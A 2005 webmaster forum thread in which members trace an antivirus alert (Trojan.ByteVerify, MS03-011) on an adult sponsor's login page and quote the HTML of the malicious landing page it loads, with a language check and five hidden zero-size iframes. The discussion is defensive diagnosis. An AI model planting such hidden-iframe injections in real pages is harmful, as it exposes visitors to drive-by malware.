Greenguy's Board


Go Back   Greenguy's Board > General Business Knowledge
Register FAQ Calendar Today's Posts

Reply
 
Thread Tools Search this Thread Rate Thread Display Modes
Old 2005-02-19, 09:00 AM   #1
frankthetank
Stupid risks make life worth living
 
Join Date: Jan 2005
Location: Renesse NL
Posts: 386
Send a message via ICQ to frankthetank
Trojan in webmaster area???

Ever heard of a sponsor which uses trojans in his webmaster area?

I just cleaned my system and when I finished that, I visited some sponsors to check stats.

Once I went to a sponsor, I got a virus alert. Kind of trojan for java virtual machine.

Is it really the sponsor or could it be me, maybe I didnīt delete all those viruses before?
frankthetank is offline   Reply With Quote
Old 2005-02-19, 09:05 AM   #2
swedguy
Vagabond
 
swedguy's Avatar
 
Join Date: Aug 2003
Posts: 2,374
Send a message via ICQ to swedguy
Post the URL here and I'll check it out. Then we can rule out if it's your machine or not.
swedguy is offline   Reply With Quote
Old 2005-02-19, 09:07 AM   #3
frankthetank
Stupid risks make life worth living
 
Join Date: Jan 2005
Location: Renesse NL
Posts: 386
Send a message via ICQ to frankthetank
Quote:
Originally Posted by swedguy
Post the URL here and I'll check it out. Then we can rule out if it's your machine or not.
http://www.dollars4babes.com/mpa2/webmasters/index.php

Just went again to the loginpage (I had cleaned the java runtime before) and got the virus alert again.
frankthetank is offline   Reply With Quote
Old 2005-02-19, 09:09 AM   #4
swedguy
Vagabond
 
swedguy's Avatar
 
Join Date: Aug 2003
Posts: 2,374
Send a message via ICQ to swedguy
Yep. I got it too.

Trojan.ByteVerify
swedguy is offline   Reply With Quote
Old 2005-02-19, 09:10 AM   #5
swedguy
Vagabond
 
swedguy's Avatar
 
Join Date: Aug 2003
Posts: 2,374
Send a message via ICQ to swedguy
http://securityresponse.symantec.com...yteverify.html

Trojan.ByteVerify is a Trojan Horse that exploits the vulnerability described in Microsoft Security Bulletin MS03-011 and could provide a hacker the ability to run arbitrary code on an infected system.
swedguy is offline   Reply With Quote
Old 2005-02-19, 09:11 AM   #6
frankthetank
Stupid risks make life worth living
 
Join Date: Jan 2005
Location: Renesse NL
Posts: 386
Send a message via ICQ to frankthetank
Quote:
Originally Posted by swedguy
Yep. I got it too.

Trojan.ByteVerify
Exactly thatīs it. I donīt like that shit. Donīt know why this is done. or is it just an accident?
frankthetank is offline   Reply With Quote
Old 2005-02-19, 09:13 AM   #7
Cleo
Subversive filth of the hedonistic decadent West
 
Cleo's Avatar
 
Join Date: Mar 2003
Location: Southeast Florida
Posts: 27,936
It tries to tell me that I'm not Win32 compliant except that page is 404 on their server. LOL
__________________
Free Rides on Uber and Lyft
Uber Car: uberTzTerri
Lyft Car: TZ896289
Cleo is offline   Reply With Quote
Old 2005-02-19, 09:16 AM   #8
frankthetank
Stupid risks make life worth living
 
Join Date: Jan 2005
Location: Renesse NL
Posts: 386
Send a message via ICQ to frankthetank
Quote:
Originally Posted by Cleo
It tries to tell me that I'm not Win32 compliant except that page is 404 on their server. LOL
I donīt think itīs funny at all. I just got listed with some freesites promoting them and if I send the surfer to trojans that wonīt be good for the reputation of my sites.

On the other hand...
frankthetank is offline   Reply With Quote
Old 2005-02-19, 09:21 AM   #9
Cleo
Subversive filth of the hedonistic decadent West
 
Cleo's Avatar
 
Join Date: Mar 2003
Location: Southeast Florida
Posts: 27,936
It tries to load this page
http://aseger.info/

That page has this on it.
<html>
<script language="JavaScript">
if (navigator.browserLanguage == 'ru' || navigator.systemLanguage == 'ru' || navigator.userLanguage == 'ru') document.location = "home.html";
</script>
<iframe src="/index1.htm" width="0" height="0"></iframe>
<iframe src="/index2.htm" width="0" height="0"></iframe>
<iframe src="/index3.htm" width="0" height="0"></iframe>
<iframe src="/index5.htm" width="0" height="0"></iframe>
<iframe src="/index6.htm" width="0" height="0"></iframe>
</body>
</html>

I'm guessing that they have been hacked since it is all iframe crap and the whois is different then their domain. I'm on a Mac so none of this affects my computer.
__________________
Free Rides on Uber and Lyft
Uber Car: uberTzTerri
Lyft Car: TZ896289
Cleo is offline   Reply With Quote
Old 2005-02-19, 09:24 AM   #10
swedguy
Vagabond
 
swedguy's Avatar
 
Join Date: Aug 2003
Posts: 2,374
Send a message via ICQ to swedguy
I just tried 6 of their hosted galleries and I get the same trojan warning there
swedguy is offline   Reply With Quote
Old 2005-02-19, 09:48 AM   #11
Ramster
Life is good
 
Ramster's Avatar
 
Join Date: Apr 2003
Location: Ottawa, Canada
Posts: 11,867
Send a message via ICQ to Ramster Send a message via AIM to Ramster
That's not good!!!!!
__________________
Pornstar Legends | Live Cam Model Shows | Hungarian Girls
Skype: robmurray999
Ramster is offline   Reply With Quote
Old 2005-02-19, 11:17 AM   #12
frankthetank
Stupid risks make life worth living
 
Join Date: Jan 2005
Location: Renesse NL
Posts: 386
Send a message via ICQ to frankthetank
Quote:
Originally Posted by Cleo
It tries to load this page
http://aseger.info/

That page has this on it.
<html>
<script language="JavaScript">
if (navigator.browserLanguage == 'ru' || navigator.systemLanguage == 'ru' || navigator.userLanguage == 'ru') document.location = "home.html";
</script>
<iframe src="/index1.htm" width="0" height="0"></iframe>
<iframe src="/index2.htm" width="0" height="0"></iframe>
<iframe src="/index3.htm" width="0" height="0"></iframe>
<iframe src="/index5.htm" width="0" height="0"></iframe>
<iframe src="/index6.htm" width="0" height="0"></iframe>
</body>
</html>

I'm guessing that they have been hacked since it is all iframe crap and the whois is different then their domain. I'm on a Mac so none of this affects my computer.
I loved my old Mac. Think to change again.
frankthetank is offline   Reply With Quote
Old 2005-02-19, 11:20 AM   #13
frankthetank
Stupid risks make life worth living
 
Join Date: Jan 2005
Location: Renesse NL
Posts: 386
Send a message via ICQ to frankthetank
I sent them an e-mail and will wait until they reply.
frankthetank is offline   Reply With Quote
Old 2005-02-19, 11:52 AM   #14
Cleo
Subversive filth of the hedonistic decadent West
 
Cleo's Avatar
 
Join Date: Mar 2003
Location: Southeast Florida
Posts: 27,936
Quote:
Originally Posted by frankthetank
I loved my old Mac. Think to change again.
If you were on the old Mac Classic then you will be absolutely delighted by Mac OS X.

No virtues, no spywear, no worms, never crashes, and runs all the Adobe, Macromedia, and all the other lager software apps plus much of the Linux open source stuff link Gimp, Open Office, etc.
__________________
Free Rides on Uber and Lyft
Uber Car: uberTzTerri
Lyft Car: TZ896289
Cleo is offline   Reply With Quote
Old 2005-02-19, 12:11 PM   #15
cd34
a.k.a. Sparky
 
cd34's Avatar
 
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
Quote:
Originally Posted by Cleo
No virtues, no spywear, no worms, never
I always love OSes with no virtues.
__________________
SnapReplay.com a different way to share photos - iPhone & Android
cd34 is offline   Reply With Quote
Old 2005-02-19, 12:18 PM   #16
Cleo
Subversive filth of the hedonistic decadent West
 
Cleo's Avatar
 
Join Date: Mar 2003
Location: Southeast Florida
Posts: 27,936
A operator error has accord. Replace operator and press any key.
__________________
Free Rides on Uber and Lyft
Uber Car: uberTzTerri
Lyft Car: TZ896289
Cleo is offline   Reply With Quote
Old 2005-02-19, 12:31 PM   #17
Useless
Certified Nice Person
 
Useless's Avatar
 
Join Date: Oct 2003
Location: Dirty Undies, NY
Posts: 11,268
Send a message via ICQ to Useless
Quote:
Originally Posted by Cleo
No virtues, no spywear, no worms, never crashes, and runs all the Adobe, Macromedia, and all the other lager software apps plus much of the Linux open source stuff link Gimp, Open Office, etc.
I'm betting OS X smokes a lot of pot too.
__________________
Click here to purchase a bridge I'm selling.
Useless is offline   Reply With Quote
Old 2005-02-19, 01:57 PM   #18
RawAlex
Took the hint.
 
Join Date: Mar 2003
Posts: 5,597
Send a message via AIM to RawAlex
That looks like the IFRAME stuff from our friend that keeps coming here offering 35 per 1000 installs. It's all crap. They install the small trojan to open the door, then they ram as much crap as possible through the open hole, hoping some of it stays in place.

I would HIGHLY recommend you remove all this sponsors hosted galleries and such from rotation at least temporarily until they get it fixed. It is truly an annoying thing.

Alex
RawAlex is offline   Reply With Quote
Old 2005-02-19, 02:02 PM   #19
Cleo
Subversive filth of the hedonistic decadent West
 
Cleo's Avatar
 
Join Date: Mar 2003
Location: Southeast Florida
Posts: 27,936
Quote:
Originally Posted by Useless Warrior
I'm betting OS X smokes a lot of pot too.
Mine dispenses two different types of intoxicating fluids when I get real creative on it.

Where did I put the bug powder…
__________________
Free Rides on Uber and Lyft
Uber Car: uberTzTerri
Lyft Car: TZ896289
Cleo is offline   Reply With Quote
Old 2005-02-19, 03:59 PM   #20
frankthetank
Stupid risks make life worth living
 
Join Date: Jan 2005
Location: Renesse NL
Posts: 386
Send a message via ICQ to frankthetank
Quote:
Originally Posted by RawAlex
That looks like the IFRAME stuff from our friend that keeps coming here offering 35 per 1000 installs. It's all crap. They install the small trojan to open the door, then they ram as much crap as possible through the open hole, hoping some of it stays in place.

I would HIGHLY recommend you remove all this sponsors hosted galleries and such from rotation at least temporarily until they get it fixed. It is truly an annoying thing.

Alex
I removed all galleries. Problem is the freesite thing. Can I change sponsors or do I risk getting banned?

On the other side installing trojans isnīt very nice.

Didnīt get a reply from the sponsor yet. Does anybody know if they are posting on gfy or so?
frankthetank is offline   Reply With Quote
Old 2005-02-19, 04:15 PM   #21
Cleo
Subversive filth of the hedonistic decadent West
 
Cleo's Avatar
 
Join Date: Mar 2003
Location: Southeast Florida
Posts: 27,936
Changing out your ads and keeping the same layout should not be a problem with your free sites.
__________________
Free Rides on Uber and Lyft
Uber Car: uberTzTerri
Lyft Car: TZ896289
Cleo is offline   Reply With Quote
Old 2005-02-19, 04:15 PM   #22
swedguy
Vagabond
 
swedguy's Avatar
 
Join Date: Aug 2003
Posts: 2,374
Send a message via ICQ to swedguy
What was the deal with Dollars4Babes some time ago?

I remember looking into them and their doings a little closer. But I don't remember why.
swedguy is offline   Reply With Quote
Old 2005-02-19, 04:23 PM   #23
frankthetank
Stupid risks make life worth living
 
Join Date: Jan 2005
Location: Renesse NL
Posts: 386
Send a message via ICQ to frankthetank
Quote:
Originally Posted by Cleo
Changing out your ads and keeping the same layout should not be a problem with your free sites.
OK, Iīll do it during the night. Thankīs. And I had a little look on the new Mac and the next machine Iīll replace will be replaced by a mac. Especially videoediting seems to be far better....
frankthetank is offline   Reply With Quote
Old 2005-02-19, 04:26 PM   #24
frankthetank
Stupid risks make life worth living
 
Join Date: Jan 2005
Location: Renesse NL
Posts: 386
Send a message via ICQ to frankthetank
Quote:
Originally Posted by swedguy
What was the deal with Dollars4Babes some time ago?

I remember looking into them and their doings a little closer. But I don't remember why.
They offer some sites with european models, especially UK and Czech. And one of their sites is "the mask", which gives the user the chance to appear as a performer.
frankthetank is offline   Reply With Quote
Old 2005-02-19, 09:05 PM   #25
BlueQuartz
The only guys who wear Hawaiian shirts are gay guys and big fat party animals
 
BlueQuartz's Avatar
 
Join Date: Jun 2004
Posts: 175
thanks for the heads up
BlueQuartz is offline   Reply With Quote
Reply


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT -4. The time now is 11:25 AM.


Mark Read
Powered by vBulletin® Version 3.8.1
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Đ Greenguy Marketing Inc